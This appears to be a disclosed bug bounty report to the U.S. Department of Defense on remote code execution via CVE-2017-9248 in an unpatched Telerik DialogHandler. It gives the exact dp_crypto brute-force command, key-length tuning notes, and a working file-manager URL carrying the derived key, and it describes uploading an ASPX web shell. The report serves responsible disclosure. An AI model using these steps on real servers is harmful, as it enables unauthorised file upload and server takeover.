U.S. Dept Of Defense: RCE on https://█████/ Using CVE-2017-9248

Summary:
https://█████████/ is hosting an unpatched version of the Telerik DialogHandler Telerik.Web.UI.DialogHandler.aspx allowing for the machine key to be brute forced. The machine key can be used to access the DNN file manager to upload arbitrary files including ASPX giving a web shell and RCE.

Description:
Telerik has a known cryptographic weakness in older versions of the Dialog Handler which when exploited can be used to brute force the machine key and gain access to the DNN file manager. The file manager allows for ASPX shell upload and RCE.

Step-by-step Reproduction Instructions
Hit https://███/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx and notice the handler dialog message.
Download https://github.com/bao7uo/dp_crypto to make brute force simple and run:
python dp_crypto.py -k https://███████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx 88 all 21

Wait for the script to finish and the key will be integrated into a link to the file manager for DNN.
You can use this link to upload arbitrary files to DNN. I uploaded a PNG for proof but ASPX works just as well here. I had to do a little trial and error on this one, it uses the ASCII character set and figuring out a key length of 88 took a little doing but going longer than the real key causes the base64 to start validating again from the beginning so in a test of 128 key length I was able to see the key repeat at the 89th position.

https://████████/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?DialogName=DocumentManager&renderMode=2&Skin=Default&Title=Document Manager&dpptn=&isRtl=false&dp=HBJ/KxQ5LRscHB8ELSgfLDIsMUYUZxs2HAchCS1mEEYfLTllLCoDGwJaCCszEhxzF2YULSsCIUsCLDY+Nj0MQQAoIiMtEyFyGBMbTixmJQIAPgBPAwYIVRcoMi8fA2QeFxMDWhUSAzkIMwdcGAMYcCwtMQAvExNZNhc5dxYTLQ0XOS09HRMYOilnA3IaKB9EFC0yPgY9YFkXOCIFFhMUPRcGIgMCdBwDGyIpCzNje1YbAgxzLBwYBBsMGwAVFiYNHS05RBRKJhQbPV9DAWULWQsMC1ouAhcfKSIIKzI4fzkBdgQ8KxIcQgMpHBMfBypFFFofex8QGAEvOBMTLHcDci8tIRQLFm9RFAMEMSwDYA0BAQtZLQ0fFh0vBEMbeAB0FD4TNBcMLWMxEzlGFhMHMCw9IisEZyZ1F2MuAhYSMUsUORM/Hi4QRQMvPTUCABgKL2cbEix3OQIUIjkIM2MIbBcdGCwBEQ8fLwwfXQMBEAkeWxNAL3ccBi0HXkktZhNMA2Z4RSsDAwIpLBg+M2YQMxd3ADwZDSVGFD9RLzA9DEEfBhwxLHY5NAAWIk0YXTlYKUspEDUWVUcCAxg6KQMABAAHKVAtEhxPBC0PRh1kPg8tWykILwNwYDBnF1ouBy0wFD0iPQsGPTkBdQwtLQ0HXQFaMnM2LQ9LLwYcMR0DAC8vEmwULQEXXCk9DAsDPHtOLXcfMAAXIkAZAxdEFXYHEgtZHEMfXQw2LVgyCQMXPVQELhMAGSgPOR0+LhILAjIvLl06NwMuG0EXPRwxCFoLXhcGNjcuHD43L2dhDxx3OVwvPVIWBxlRShQQfysvAwAEHykXQix3BAkcKDFnHwEQPxkGDzEtEwMAHAIpURl0OUYbBgw1NQMAGxheFC4dPyUEGi0QFDEsNWooIwAjAgFZdRQ4YCkrZxxNKDIbNTBgdw8ZEQQUKRIlLwMQE2QZdQtLBj0tWy93BDcbBCUgGGctBwU6LQMVdQ8/GwQUJgYQOjQUaD10GAM5aR0yMhAEPS1IHj4AIy0DIjIZOxcTA1oEARktGzo0FAwIAA0iDiw4E0QZHD0CFXQUAAcFB1sedhBwGQY2AioCNWwEPgNaLREPDRkvFAQEAhgbHl4YLRl1fHwZBgw0BD0QSyksIisuLi5zGQIlPSxmOWwbLiUoAxRoRBopLggsEWUOGBAQBh4SKQkzWC1+KWcydS8yJQkUAgtZMBMXWisDOQEvAyIACAIyORdjIT8DABNZLCIqKw==

https://████/GSP.png

Product, Version, and Configuration (If applicable)
Telerik <= 2017.1.118

Suggested Mitigation/Remediation Actions
Patch Telerik or switch to a different editor like CKEditor.

Impact

Critical: Exploitation allows for a web shell, defacement, etc through arbitrary unrestricted file uploads.